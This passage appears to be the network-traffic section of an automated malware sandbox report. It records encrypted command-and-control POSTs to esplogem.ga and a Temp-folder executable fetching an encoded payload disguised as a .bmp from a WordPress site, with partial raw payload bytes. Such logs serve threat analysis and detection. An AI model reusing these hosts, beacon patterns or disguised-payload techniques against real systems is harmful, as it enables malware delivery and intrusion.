                                                                                Nov 22, 2022 05:09:03.278359890 CET230INData Raw: 7e 5d 00 10 4b 35 e2 fa 22 09 9c f0 b4 58 12 1e 37 b8 64 b2 88 e5 a5 3c 04 42 c1 32 09 00 ee aa d3 47 29 33 f9 a9 29 1f 15 f6 a6 f7 5d 8a db e9 aa e8 f2 d0 cd d4 e8 63 14 37 4f d3 00 d3 cc 8e 5e c3 33 4e 11 ba 00 50 7f 39 bc ee 7b 4b fc 71 d7 4b
                                                                                Data Ascii: ~]K5"X7d<B2G)3)]c7O^3NP9{KqKT2IIA=(&;]us:\)(%yW6t_rCWp [Rt~hvr99><R(/H5c*hdB1V\'uANX1
                                                                                Nov 22, 2022 05:09:03.278403044 CET231INData Raw: 17 57 0c 6f 3d 9a 27 f3 74 ac c9 9a 53 43 d1 dd 50 b2 a3 c0 3e c9 59 a4 ab 88 ff d9 73 c5 8c 90 61 4b 55 35 70 3d 19 76 b8 17 3e 54 e9 5f 93 dc 28 16 f6 7e 92 e2 5e 0f 41 1a 6e cd 61 36 6d 0d bc 59 a1 db 32 2e 91 02 ef 3b 34 69 63 ae 8f ad 93 0a
                                                                                Data Ascii: Wo='tSCP>YsaKU5p=v>T_(~^Ana6mY2.;4iccBf>pEdnsVpTO:HlW2uAWb>-U`nUlM_L-;#!Lx6m!B/)v IqpjDM_vhp(=vie|Pr"%1
                                                                                Nov 22, 2022 05:09:03.279944897 CET232INData Raw: 45 1f 47 b2 01 d4 1f 30 82 1c 0d 0c 68 d1 e4 25 d5 07 a7 53 5a d4 b0 e6 b7 4e 86 b9 01 cf 23 cc 01 7b 18 fd 42 a9 8d 6c 69 c5 0a 43 50 37 59 fe e6 4b e5 a6 6e b8 50 ae 3d c0 e7 d1 ca d9 c2 ce b0 af 51 76 f0 63 a9 6f b3 a5 1b 0d 49 b0 0f 26 59 d6
                                                                                Data Ascii: EG0h%SZN#{BliCP7YKnP=QvcoI&Y|$ES^TU-pYTBFL1U_(.xWu=r(&J80=2wj*P6o"s
                                                                                Nov 22, 2022 05:09:03.279993057 CET234INData Raw: b4 7c 81 64 78 79 a8 ca 26 b2 6b f6 5a 8d 2a b7 c8 4f 6c f3 48 52 a7 4c f0 de 90 b2 37 4e f6 a9 42 dd fd 0f ba ee 3b 8f fb 5b b6 cf ff ad 8a 8e c6 0e 55 75 85 59 1a ba c4 af f9 5e 60 ef 4a 1f 10 ca a7 30 38 77 d0 46 81 82 54 7e 17 e7 a5 6c 9f 83
                                                                                Data Ascii: |dxy&kZ*OlHRL7NB;[UuY^`J08wFT~lm,;2bQmxQt$'oAEAWv8h8f*amvVC*Q-:-X()h^?=&k)"NN(oh\zJV+!n
                                                                                Nov 22, 2022 05:09:03.280034065 CET235INData Raw: 1e 0d 3a a8 1e 55 58 62 e8 f0 64 ce 73 1e 61 46 2d a8 4a e9 eb ba 94 91 d9 eb f7 75 2a b4 db 07 d2 af d0 e1 d5 58 7b 31 cf f4 2c 44 fc b4 d1 92 a1 4c ad 41 db b9 01 4b 88 6c dc 57 98 fc af 5e 87 b7 7a be 98 48 4b 8e dc 3c f0 5f 8a 39 98 89 1f ee
                                                                                Data Ascii: :UXbdsaF-Ju*X{1,DLAKlW^zHK<_9}zZ+<CQ6,>L2v,n8cm&GB~u$"MHdvr!&)Bv?# w/HFhhgowsP&yUkG\YEf|w
                                                                                Nov 22, 2022 05:09:03.280076027 CET236INData Raw: 4b 0d d5 a6 28 06 8b 18 01 2d 26 5e 23 47 79 7d 2b c0 d9 b9 2e b2 5f 9b 0a b8 49 a1 32 47 4b 97 7a 82 5d d9 47 22 e4 b0 f2 3b a6 05 fa 0a 8b a1 76 1a 14 aa c5 2c 05 0c 67 3b 48 3f 47 36 ce a7 dc 62 42 65 a9 5c d5 26 55 52 91 d9 b9 1f ca 4c 09 4e
                                                                                Data Ascii: K(-&^#Gy}+._I2GKz]G";v,g;H?G6bBe\&URLN:=iR>@=+$awaa^>$wlu?B0Eyw5cPxZHAQdaA2inxvUmAC6=}qu\,b/.<1-E*%gw
                                                                                Nov 22, 2022 05:09:03.281816959 CET238INData Raw: df 02 17 98 9a 5c 37 99 39 81 1a 6b 3a 8b 7b 87 0b 9e 61 6b 0c 4c 28 b5 d3 61 18 c0 27 7b 92 f8 7c 77 3f c8 42 d3 e1 a2 a4 6f c5 90 70 e3 9b 4c 48 e1 f6 f5 93 2d 1f 8e cd 22 51 bc 19 64 8e bf cc a0 cf 78 66 a2 22 4d f2 f8 34 3e 7f fc 31 c9 26 46
                                                                                Data Ascii: \79k:{akL(a'{|w?BopLH-"Qdxf"M4>1&F>Kag+]?LL~Hn2wYqF&'*0?Grvg'i/V(B]J-HE~psn.@fi@/+EA0m,YT
                                                                                Nov 22, 2022 05:09:03.281862974 CET239INData Raw: 9c af f9 15 f5 77 a7 b0 d6 02 fb ce 21 8f 2c 6a c0 26 3d ce b7 d5 d0 06 c6 38 dd 03 46 56 83 fb 0c 21 70 47 9c 44 a8 80 42 dd 2c 5c 05 9d f9 04 9d 40 99 e3 f4 5a 29 00 31 4f 42 f1 84 34 24 30 e4 f2 cf 5e 5b 01 47 cc 5b 31 64 71 26 4a e7 44 32 f8
                                                                                Data Ascii: w!,j&=8FV!pGDB,\@Z)1OB4$0^[G[1dq&JD2|gdcmHy5B8Q6$^F>7cj>xT9 d:Ee'Y[tG)z)VMK'l}e7r9$V>^VW^a-g[R 6a
                                                                                Nov 22, 2022 05:09:03.456617117 CET240INData Raw: 80 4f d1 61 88 0b fe 01 6c 12 0b c6 83 94 69 7f 02 84 5e d9 03 3c 7e 47 fb f0 73 75 fb 08 c5 df 42 c6 e4 7f 48 71 b7 0e bc 7a 7f be 77 92 98 ad e8 11 99 e2 d0 d3 d2 d0 3c 6c 55 d4 a0 f2 d1 14 cf 4b 86 df 15 af 23 0d 52 b2 f4 86 50 ef ba 00 60 5e
                                                                                Data Ascii: Oali^<~GsuBHqzw<lUK#RP`^q(c.\n;HvE}Y/)r_0x+ &wx%nE&NYzTuuJttyIdcpmfy~H|H;bRjVr|7
                                                                                Nov 22, 2022 05:09:04.662213087 CET548OUTPOST / HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Accept: */*
                                                                                Referer: http://wrbatho.org/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                Content-Length: 328
                                                                                Host: esplogem.ga
                                                                                Nov 22, 2022 05:09:04.662293911 CET548OUTData Raw: 05 98 b3 99 cb 07 0e f3 a4 3f 35 ee 2b fc 9d 3c 01 7f c9 02 3b 98 8a ce a1 82 b6 33 50 7a 54 d5 5c 1a 95 c7 b5 f0 24 dc 60 a5 32 f7 8b b1 ec 29 42 64 65 a0 31 c3 2e ed 78 47 29 1a 39 ba ac 2e ee c6 e7 6b 13 95 10 0f c5 6d 18 19 aa ea 5e d5 2b cd
                                                                                Data Ascii: ?5+<;3PzT\$`2)Bde1.xG)9.km^+$HbTNt$1m#::B!y6DbxRo>'+"]y7GwwJLHAAU-FiU06_Mu59r\(>?kOP
                                                                                Nov 22, 2022 05:09:05.115153074 CET549INHTTP/1.1 404 Not Found
                                                                                date: Tue, 22 Nov 2022 04:09:04 GMT
                                                                                server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                                x-powered-by: PHP/5.6.40
                                                                                content-length: 68
                                                                                content-type: text/html; charset=utf-8
                                                                                Data Raw: 00 00 e9 b1 b9 7a b7 9f b8 5b a9 00 56 82 fd 2b e6 63 3e 4f 70 2d 2e 0e a0 ad f5 e4 c6 97 3d e9 e3 9f 55 d1 89 49 23 16 18 9d 69 92 1b b0 2b d5 f1 f0 9f 9d 6b 44 4a 35 92 58 d3 de 03 b0 c0 5c 6e 0e 34 28
                                                                                Data Ascii: z[V+c>Op-.=UI#i+kDJ5X\n4(
                                                                                Nov 22, 2022 05:09:06.095182896 CET555OUTPOST / HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Accept: */*
                                                                                Referer: http://awqeauxao.com/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                Content-Length: 290
                                                                                Host: esplogem.ga
                                                                                Nov 22, 2022 05:09:06.095243931 CET555OUTData Raw: 05 98 b3 99 cb 07 0e f3 a4 3f 35 ee 2b fc 9d 3c 01 7f c9 02 3b 98 8a ce a1 82 b6 33 50 7a 54 d5 5c 1a 95 c7 b5 f0 24 dc 60 a5 32 f7 8b b1 ec 29 42 64 65 a0 31 c3 2e ed 78 47 29 1a 39 ba ac 2e ee c6 e7 6b 13 95 11 0f c5 6d 18 19 aa ea 3a a2 0c 9b
                                                                                Data Ascii: ?5+<;3PzT\$`2)Bde1.xG)9.km:_="?9{&%YgwU&#zDJDoSKX|Qe-_?x!czxRN8|,cpS'fDW#5B42rXMnt<APjSNSR
                                                                                Nov 22, 2022 05:09:06.550064087 CET557INHTTP/1.1 404 Not Found
                                                                                date: Tue, 22 Nov 2022 04:09:06 GMT
                                                                                server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                                x-powered-by: PHP/5.6.40
                                                                                transfer-encoding: chunked
                                                                                content-type: text/html; charset=utf-8
                                                                                Data Raw: 32 38 37 36 0d 0a 00 00 f5 95 d9 1f d7 f6 d1 35 9b 20 3e f6 a8 5b 48 a5 84 57 78 48 5a 6d e3 c7 9b 97 a0 fb 41 8a d6 a8 14 dc 92 41 62 01 28 a7 64 90 1f a0 02 d4 bb ad c1 8f e4 71 79 30 03 6c 8e ee 31 9d f5 6f 40 67 47 47 fc 47 77 46 90 2a 1d f7 37 7a 03 1d 9b a8 09 ab a8 6d c4 51 ce aa c6 f0 7a c4 74 c6 6e 1d 3d 81 a1 34 90 34 71 64 56 99 95 8e e0 26 d1 9d 9e d5 a7 ee e5 9f 7f 9b d8 76 46 62 8b e9 1a 9f 8a 0b 68 b6 3c 4d 0a 9c 0f 5c b6 6f ad 41 92 6e f8 00 b1 df 4c b1 a8 0e 42 e5 ce 81 9f 3c 0e 84 71 ae a1 e3 cc 11 b4 8c e1 28 e1 6e 2f 0c bf 34 cc ed ac a3 8b f8 3f 04 6a c7 34 f0 96 ed d8 be fc 25 e6 b9 b0 39 55 71 f5 7f a1 71 8f fb c0 b3 21 e9 fa d6 68 70 34 54 51 a2 e1 2b c9 df fb 83 3a 75 ed 56 44 0b 1e 43 1b 8b fe 93 eb 67 41 31 04 a6 88 dc f3 03 d0 0b ed ba 3b 2a 3f d8 ab 56 d6 9b 3e 65 20 50 96 00 0d 88 59 f7 ca 8b 4e f2 f0 f2 66 a9 a8 ec 31 ca 11 0e 08 37 8d b3 57 52 f8 79 01 66 25 cd 00 81 fb 41 7a 84 ab 5f 43 d5 d2 38 cb 8f 27 eb af 18 02 75 24 27 b0 df 7e 11 88 92 37 a7 de fb d2 ea 13 b6 94 51 30 c3 59 1f a8 59 05 7e 35 c5 af 01 be 57 26 cc 9d de 56 88 3e f1 64 a4 4d d0 6b ec a7 48 91 75 96 34 0c cd ba 14 22 be 00 11 f4 4f d1 87 d3 f2 08 ce f1 33 37 4e 09 58 4a 1f 0a 34 25 2c c9 05 67 a8 52 f2 72 fb 0f cb ee be 91 1d 8e b5 02 cb f7 80 ee 87 80 eb f4 5f db aa af d3 54 6b e4 4d 6c 7b 70 f2 75 56 a0 c0 e2 6e e6 8b 82 00 28 4f b2 68 46 7d ee db eb ce 3e f9 60 e5 43 ff a7 ff 5e 2a d3 f3 d9 60 7b 51 6c 77 2d 38 17 86 9f f9 a5 88 19 f6 c4 31 2c 97 e9 89 cb 72 5d e4 48 48 5b d0 44 33 d7 47 8a 65 71 a7 c3 0b e5 83 85 ea df ec 27 cf 4d 5c 40 f8 e5 28 76 66 67 20 f8 4c 0b 9f eb b1 6a ec 04 c1 47 a5 86 c2 10 87 95 16 bd 8b 73 af 68 ac 0e de 1c 87 2e 16 8a f9 8d f0 d8 17 af 7f 19 ee f8 6c 85 8c 4c 10 9b cf ad bd 8b 39 c5 f8 8c 3a 12 3b e2 00 99 3e 2a 7f 22 1a 3c 66 b2 ae ef 15 fc 62 60 eb c3 59 f6 b8 03 cd 88 5f 4c 1c e5 ff 87 a9 39 fc 9f da e2 9a fc e8 8c b6 5e de 95 30 db f4 e1 ee 3e 30 23 6c a7 f8 f9 ac 11 d8 cb 1e 56 f1 bc 71 fb 3e c2 39 48 c9 23 db 18 b8 2a 92 31 23 87 61 d0 b8 3e 0e d3 52 af 2c 2d 21 f2 33 92 b7 82 a4 b3 82 9b df e1 5a 1e 03 e0 e9 36 92 e0 53 a7 10 d7 b3 b5 1f 2d 7e 8d 4b 51 3f d7 4a f4 f7 e5 bd 4f eb ed 7a 44 fe b7 4a 1d 77 3d 7d 63 1a c6 f1 60 21 76 1f c1 ae 07 66 f5 e2 ed 78 81 c7 22 e3 d5 e2 c3 2f 22 ee 60 92 e3 ff db 38 ae c5 1b 86 1a 64 06 d0 9b 6a 59 6a 98 3b 18 46 32 43 3b 11 d8 bc 88 5b d4 29 07 26 81 28 68 f5 be fd 46 9c af b3 15 34 c7 a2 c9 2f 00 7b d9 e3 38 eb 59 b0 90 a6 50 97 b5 29 bf e1 76 de cf ab e5 c7 b9 d3 86 a6 70 e3 01 56 f6 8f 95 c2 62 ae bc 1e 52 a5 20 5b e1 38 af 25 98 b6 33 c7 66 5e e4 42 e7 91 d9 5e e4 e3 39 5b ee 03 9a eb 5e 13 de 0f a9 16 f0 f0 16 4e 7a cb d8 1f 37 a1 a5 1c 54 fb cc c7 30 19 7b ca cc 30 2d 53 c8 ac 0b a8 77 b6 72 a3 3d d2 de f5 06 02 c4 46 8f 72 bd 09 0b 7d 58 06 89 91 cf 31 20 15 f8 f0 f1 77 18 e5 16 db 05 83 08 93 7d 9c b0 9d a7 e4 a8 26 e7 ad e3 80 e5 77 01 28 0f 39 20 8a 9d a9 35 64 2e 68 44 41 af 3a 6d 8d 09 eb e5 cd b2 5c c6 59 e5 40 66 e0 6a d8 54 66 bc 76 e1 91 28 5c ac 3b c1 f4 53 0d 5d ec 6a 63 69 6d 6b c6 80 80 1c 4a ab a4 ae 40 da 93 dc a0 cc 42 ff c9 9b 89 6a 6b 57 cf 98 d8 6a bf 82 74 dd 4b 50 23 ff 34 5d 73 47 1d ed 1a 5a 83 5b 32 e4 91 80 57 21 c0 7a b1 ee 04 f4 db 2f a0 c0 bd 20 e8 0b 87 73 76 13 ec da 1f 2f 94 06 9d 3e
                                                                                Data Ascii: 28765 >[HWxHZmAAb(dqy0l1o@gGGGwF*7zmQztn=44qdV&vFbh<M\oAnLB<q(n/4?j4%9Uqq!hp4TQ+:uVDCgA1;*?V>e PYNf17WRyf%Az_C8'u$'~7Q0YY~5W&V>dMkHu4"O37NXJ4%,gRr_TkMl{puVn(OhF}>`C^*`{Qlw-81,r]HH[D3Geq'M\@(vfg LjGsh.lL9:;>*"<fb`Y_L9^0>0#lVq>9H#*1#a>R,-!3Z6S-~KQ?JOzDJw=}c`!vfx"/"`8djYj;F2C;[)&(hF4/{8YP)vpVbR [8%3f^B^9[^Nz7T0{0-Swr=Fr}X1 w}&w(9 5d.hDA:m\Y@fjTfv(\;S]jcimkJ@BjkWjtKP#4]sGZ[2W!z/ sv/>
                                                                                Nov 22, 2022 05:09:06.625479937 CET567OUTPOST / HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Accept: */*
                                                                                Referer: http://posyylxo.org/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                Content-Length: 274
                                                                                Host: esplogem.ga
                                                                                Nov 22, 2022 05:09:06.625541925 CET567OUTData Raw: 05 98 b3 99 cb 07 0e f3 a4 3f 35 ee 2b fc 9d 3c 01 7f c9 02 3b 98 8a ce a1 82 b6 33 50 7a 54 d5 5c 1a 95 c7 b5 f0 24 dc 60 a5 32 f7 8b b1 ec 29 42 64 65 a0 31 c3 2e ed 78 47 29 1a 39 ba ac 2e ee c6 e7 6b 13 95 12 0f c5 6d 18 19 aa ea 52 90 1c cc
                                                                                Data Ascii: ?5+<;3PzT\$`2)Bde1.xG)9.kmR4C^n1po!Zqs02$/WLg20mzJ(9&*`<.xMi{G;gC"(:/m75crO92GL@JVp9f%u~
                                                                                Nov 22, 2022 05:09:07.082398891 CET568INHTTP/1.1 404 Not Found
                                                                                date: Tue, 22 Nov 2022 04:09:06 GMT
                                                                                server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                                x-powered-by: PHP/5.6.40
                                                                                transfer-encoding: chunked
                                                                                content-type: text/html; charset=utf-8
                                                                                Data Raw: 31 41 39 46 0d 0a 00 00 e8 84 4a 1b c0 f6 d7 35 97 20 3e f6 76 a4 95 59 a9 60 1e 49 5a 6d c3 c2 db 97 b3 fb 49 88 8d eb 7b b2 e6 24 0c 75 77 f3 1d e0 7a d3 5f fa c3 c0 ad af 46 75 7b 18 a3 6c 8c ee 31 9d 75 6f 40 67 49 58 46 49 77 f2 99 e7 3c 4f 36 36 ce 3c cf c0 60 d8 88 1d b6 3e a9 d8 a7 9d 5a a7 15 a8 00 72 49 a1 c3 51 b0 46 04 0a 76 f0 fb ae a4 69 82 bd f3 ba c3 8b cb 92 72 91 fc 76 46 62 8b e9 1a 9f da 4e 68 b6 70 4c 09 9c c7 7a ca 0c ad 41 92 6e f8 00 b1 df ac b1 aa 0f 49 e4 c6 81 9f 2e 0e 84 71 7e a0 e3 cc 11 b4 8c b7 18 e1 6e 2f 2c bf 34 cc ad ac a3 8b f8 7f 04 6a e7 34 f0 96 ef d8 be f8 25 e6 b9 b0 39 55 71 f3 7f a1 71 8f fb c0 b3 21 a9 f8 d6 68 72 34 54 51 a2 e1 2b cb df 9b 06 3a 75 fd 56 44 1b 1e 43 1b 8b ee 93 eb 77 41 31 04 a6 88 dc e3 03 d0 0b ed ba 3b 2a 3f d8 ab 56 da ab 3e 65 6a 50 96 00 0d c8 59 f7 45 46 4f f2 f0 f2 66 a9 a8 ec 31 ca 11 0e 08 37 8d b3 57 52 f8 59 03 66 29 cd 00 81 fb 41 7a 84 ab 5f 43 d5 d2 38 cb 8f 27 eb af 18 02 75 24 27 b0 df 7e 11 88 92 37 a7 de fb d2 ea 13 b6 94 51 30 c3 59 1f a8 59 05 7e 35 c5 af 01 be 77 26 cc 95 de 56 88 3e f1 64 a4 4d d0 6b ec af 68 91 75 de 34 0c cd ba 14 22 be 00 11 f4 4f ff f3 b6 8a 7c ce f1 33 6b 5e 09 58 4a 3f 0a 34 25 3e c9 05 67 aa 52 f2 72 fb 0f cb ee be 91 1d 8e b5 02 cb d7 80 ee e7 ae 99 87 2d b8 aa af d3 db a6 e5 4d 6c 3b 70 f2 75 98 a1 c0 e2 7a e6 8b 82 00 28 4f b2 68 46 7d ee db eb ce 7e f9 60 a5 6d 8d c2 93 31 49 d3 f3 d5 60 7b 51 6c 57 2f 38 17 84 9f f9 a5 6a 18 f6 c4 31 2c 97 e9 89 cb 72 5d e4 48 48 1b d0 44 71 d7 47 8a 65 71 a7 c3 0b e5 83 85 ea df ec 27 cf 71 6c 40 f8 e5 28 76 66 2f 20 f8 4c 09 9f ee b1 72 cf 04 c1 b3 a9 86 c2 13 87 95 16 b7 8b 73 a9 68 ac 0e de 1c 87 2e 16 8a f9 8d f0 d8 17 af 7f 19 ee f8 6c 85 8c 4c 10 9b 7b f9 76 e5 fb f5 e8 30 6d f8 04 a6 be cf b7 8b f8 88 b0 34 7a 48 96 47 5f 71 6d 00 07 c4 2b 1d f1 dd 2f 72 a4 28 34 d7 81 86 c3 18 6b 8c f3 bb 05 1b 0f 4a 70 f6 fc 20 bb b7 fd da ac 3f 52 e7 43 dd de d1 65 ac 0a d3 63 ee 55 7e 48 da f1 70 cd a1 eb 68 65 b0 d9 28 a1 80 f2 7d b0 54 a0 f5 0a 9b 41 f1 79 79 93 99 23 9f 57 be 1d a1 dc 8a d4 fe 9a 4b 8c 3a 33 3c 36 31 40 b7 51 1f fc 97 2c 50 a5 00 96 20 d6 cb c8 37 fa a5 8c f7 e1 fc 22 08 fe 9c 00 d1 74 6b 94 62 ab 8d de 80 7d d4 34 ad 2b d5 c4 a4 45 39 76 ce ed 6b f4 28 49 f2 f0 13 f0 b9 42 69 87 a3 32 50 26 d0 ee ef 6c 50 8d a2 2e e1 f5 e2 18 73 ff 4e d1 9d 94 16 c0 2e 10 f9 b0 91 98 39 da 10 bf 16 14 f3 87 49 39 70 d7 99 d3 30 f3 74 65 5f 20 a1 67 05 2e cb ff cf 35 9e 9d 67 3a 4a 74 ba 4a 23 87 43 ac 93 fd b9 e1 56 af fa 75 af e6 2c d4 ae b0 33 4c ed 70 b5 2c e7 20 46 12 b1 b1 13 9f d0 5c a3 23 3f cc 24 0c a9 e4 56 6f c8 6b ce 4f 23 d6 0e 42 66 d1 0d af fe 17 7f ab a5 04 fa 2c 44 68 23 90 c4 68 57 36 f4 66 1d 24 5c f0 d8 76 b7 0d dd 3c 18 2e fc 0b c7 84 12 ea de 05 b1 71 15 12 f9 b1 68 86 cd 31 20 fb 1d df d6 0c 7b cd 3f e4 37 fb 0a 9b 7d 98 9d ad b3 04 3f 3f 50 5e e5 f3 f8 39 03 22 8f 30 20 82 9b 88 45 01 42 1f 40 75 f6 40 2a de 03 61 e8 cf 9a fa ed 8a cd 5e 66 e0 60 f3 98 09 a3 76 e1 9b 03 9b 84 39 c1 f4 78 26 82 e6 41 bd 6f 46 b6 c6 93 b0 19 4a 2f a4 ae 40 d9 93 dc b1 da 6f f8 dc b7 8d 41 26 7c 9d 84 f4 5b a9 a9 3b f6 67 7b 6d d4 7b 2f ae 47 1d 9d 31 15 a8 0f 19 b1 e3 5d 57 21 b0 51 e4 60 6d a9 4a 51 a1 c0 bd 24 ef 9a e6 a1 19 33 ec da 15 28 83 5e 96 39
                                                                                Data Ascii: 1A9FJ5 >vY`IZmI{$uwz_Fu{l1uo@gIXFIw<O66<`>ZrIQFvirvFbNhpLzAnI.q~n/,4j4%9Uqq!hr4TQ+:uVDCwA1;*?V>ejPYEFOf17WRYf)Az_C8'u$'~7Q0YY~5w&V>dMkhu4"O|3k^XJ?4%>gRr-Ml;puz(OhF}~`m1I`{QlW/8j1,r]HHDqGeq'ql@(vf/ Lrsh.lL{v0m4zHG_qm+/r(4kJp ?RCecU~Hphe(}TAyy#WK:3<61@Q,P 7"tkb}4+E9vk(IBi2P&lP.sN.9I9p0te_ g.5g:JtJ#CVu,3Lp, F\#?$VokO#Bf,Dh#hW6f$\v<.qh1 {?7}??P^9"0 EB@u@*a^f`v9x&AoFJ/@oA&|[;g{m{/G1]W!Q`mJQ$3(^9
                                                                                Nov 22, 2022 05:09:07.937488079 CET697OUTPOST / HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Accept: */*
                                                                                Referer: http://yljegbhrf.net/
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                Content-Length: 213
                                                                                Host: esplogem.ga
                                                                                Nov 22, 2022 05:09:07.937488079 CET697OUTData Raw: 05 98 b3 99 cb 07 0e f3 a4 3f 35 ee 2b fc 9d 3c 01 7f c9 02 3b 98 8a ce a1 82 b6 33 50 7a 54 d5 5c 1a 95 c7 b5 f0 24 dc 60 a5 32 f7 8b b1 ec 29 42 64 65 a0 31 c3 2e ed 78 47 29 1a 39 ba ac 2e ee c6 e7 6b 12 95 12 0f c5 6d 19 19 aa ea 0c ab 3f be
                                                                                Data Ascii: ?5+<;3PzT\$`2)Bde1.xG)9.km?sCE5M-9YHLYA0~Z:Q;t/oJ!V)L'>!9!GyqP$k~KFH(ghRf+u;uU"
                                                                                Nov 22, 2022 05:09:08.391273022 CET698INHTTP/1.1 404 Not Found
                                                                                date: Tue, 22 Nov 2022 04:09:08 GMT
                                                                                server: Apache/2.4.6 (CentOS) PHP/5.6.40
                                                                                x-powered-by: PHP/5.6.40
                                                                                content-length: 327
                                                                                content-type: text/html; charset=utf-8
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                5192.168.2.2249175183.78.168.2480C:\Users\user\AppData\Local\Temp\A173.exe
                                                                                TimestampkBytes transferredDirectionData
                                                                                Nov 22, 2022 05:09:09.310182095 CET698OUTGET /wp-content/Mzyroxbxfa.bmp HTTP/1.1
                                                                                Host: www.hzncars.com.my
                                                                                Connection: Keep-Alive
                                                                                Nov 22, 2022 05:09:09.465435982 CET699INHTTP/1.1 200 OK
                                                                                Date: Tue, 22 Nov 2022 02:42:01 GMT
                                                                                Server: Apache/2
                                                                                Last-Modified: Mon, 21 Nov 2022 21:05:05 GMT
                                                                                ETag: "20b000-5ee0168e4b869"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 2142208
                                                                                Vary: Accept-Encoding,User-Agent
                                                                                Keep-Alive: timeout=2, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: image/bmp
                                                                                Data Raw: 17 30 f8 78 6b 6a 68 66 7d 6b 63 67 a5 95 68 78 d0 6a 68 66 79 6b 63 67 1a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 da 6a 68 78 66 75 d2 68 79 df 6a aa 7b d2 69 34 a5 4b 3c 0e 10 18 43 17 28 05 0f 0a 09 07 48 05 18 05 0d 08 2e 4a 0a 1d 48 18 1d 08 59 02 0d 47 1e 25 3b 58 05 05 0c 03 57 66 6e 6d 7e 6a 68 78 68 6a 68 66 29 2e 63 67 16 6b 6b 78 04 91 13 05 79 6b 63 67 5a 6a 68 78 88 6a 66 47 72 6a 65 67 5a c2 48 78 68 6c 68 66 79 6b 63 67 54 ad 48 78 68 4a 68 66 79 8b 43 67 5a 6a 28 78 68 4a 68 66 79 69 63 67 5e 6a 68 78 68 6a 68 66 7d 6b 63 67 5a 6a 68 78 68 4a 49 66 79 69 63 67 5a 6a 68 78 6b 6a 28 e3 79 6b 73 67 5a 7a 68 78 68 6a 78 66 79 7b 63 67 5a 6a 68 78 78 6a 68 66 79 6b 63 67 5a 6a 68 78 a8 ac 48 66 32 6b 63 67 5a 8a 48 78 04 69 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 49 78 64 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 4b 63 67 52 6a 68 78 68 6a 68 66 79 6b 63 67 52 4a 68 78 20 6a 68 66 79 6b 63 67 5a 6a 68 78 46 1e 0d 1e 0d 6b 63 67 4e cd 48 78 68 4a 68 66 79 c3 43 67 5a 68 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 48 6a 68 06 57 19 10 15 39 6a 68 78 04 69 68 66 79 8b 43 67 5a 6e 68 78 68 c0 48 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 39 6b 63 a7 74 18 0d 14 07 09 68 66 75 6b 63 67 5a 6a 49 78 68 68 68 66 79 c5 43 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 1a 6a 68 3a 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 89 ad 43 67 5a 6a 68 78 20 6a 68 66 7b 6b 66 67 a2 30 66 78 e8 88 65 66 78 6b 63 67 5a 6a 68 78 10 57 74 66 d3 ee 67 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 79 6b 63 67 5a 6a 68 78 68 6a 68 66 